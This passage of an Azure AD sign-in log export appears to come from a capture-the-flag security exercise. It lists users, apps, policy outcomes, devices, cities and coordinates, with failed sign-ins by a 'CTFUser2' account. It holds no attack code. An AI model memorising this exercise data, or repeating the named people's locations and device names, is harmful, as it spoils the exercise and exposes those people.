'69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",ee24a1df-994f-48af-adf3-fe18f5fe1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ee24a1df-994f-48af-adf3-fe18f5fe1800,SigninLogs,Sucess,36.6404686,-78.26995087
+407,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:20.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,0ba2ceb9-9617-4775-98e0-ec9cc7f7aa90,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,MSX Insights Production,75c6cfc8-e031-40aa-8392-e9f0463abbbd,,[],notApplied,09/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",3cf5caa0-eacb-4cee-a6ac-5420d5521900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3cf5caa0-eacb-4cee-a6ac-5420d5521900,SigninLogs,Failed,47.68061829,-122.1869888
+408,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:50.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4db84031-3b63-496a-91d6-4b9e01cca26c,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:18,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",ecc2d3c2-4c88-4d4d-873f-6f53db190000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,ecc2d3c2-4c88-4d4d-873f-6f53db190000,SigninLogs,Sucess,32.32146072,34.85319901
+409,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:15.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4739a249-a8cf-4216-b575-e80280152861,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",8900d912-3d17-47c8-917b-3b43834c1b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,8900d912-3d17-47c8-917b-3b43834c1b00,SigninLogs,Sucess,50.6406517,5.572050095
+410,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:25.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dc28eabe-2330-4976-a308-e5e92998ade0,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e9069a8f-c043-4e23-9435-a55672411800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,e9069a8f-c043-4e23-9435-a55672411800,SigninLogs,Sucess,33.7984581,-84.38828278
+411,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:24.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c6493d22-f3d4-41bd-a6d1-023444c4220e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",47dc00a1-c484-43d0-a54f-677796be1900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,47dc00a1-c484-43d0-a54f-677796be1900,SigninLogs,Sucess,36.6404686,-78.26995087
+412,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:05.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f573c208-54a9-4700-ad15-250885419633,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:24,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",f240e889-79f1-4724-be47-97c8a1884100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f240e889-79f1-4724-be47-97c8a1884100,SigninLogs,Sucess,32.32146072,34.85319901
+413,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:17.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d289af76-d369-458b-90a9-52e6127622f3,Microsoft.aadiam,Microsoft.aadiam,,Sridhar Periyasamy,4,CA,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 00:59,"{'operatingSystem': 'Windows 10', 'deviceId': '92720cc2-dd49-4250-a03f-8aa941f16177', 'browser': 'Edge 18.1836', 'displayName': 'SRIDHAR-SBOOK', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",fa160daf-6abe-49f2-9541-40bcbc700300,,,"{'countryOrRegion': 'CA', 'geoCoordinates': {'longitude': -119.27671813964844, 'latitude': 50.238258361816406}, 'state': 'British Columbia', 'city': 'Vernon'}",none,none,none,none,[],{'errorCode': 0},Sridhar Periyasamy,0dd4a385-2ff9-4fcb-9798-f748c832b74a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,fa160daf-6abe-49f2-9541-40bcbc700300,SigninLogs,Sucess,50.23825836,-119.2767181
+414,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:48.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,f5b32424-e485-4198-a589-3641f80b9477,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,MSX Insights Production,75c6cfc8-e031-40aa-8392-e9f0463abbbd,,[],notApplied,09/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",ad1175c1-f0b5-45dc-98ba-8a7de6c42100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ad1175c1-f0b5-45dc-98ba-8a7de6c42100,SigninLogs,Failed,47.68061829,-122.1869888
+415,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:25.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e92e1fa3-c341-4da3-9f42-0628eb20bd0e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",80d584c4-dd35-4dcb-882c-059341581700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,80d584c4-dd35-4dcb-882c-059341581700,SigninLogs,Sucess,33.7984581,-84.38828278
+416,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:14.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8fa78b68-2835-468d-a282-47d1fd39245c,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 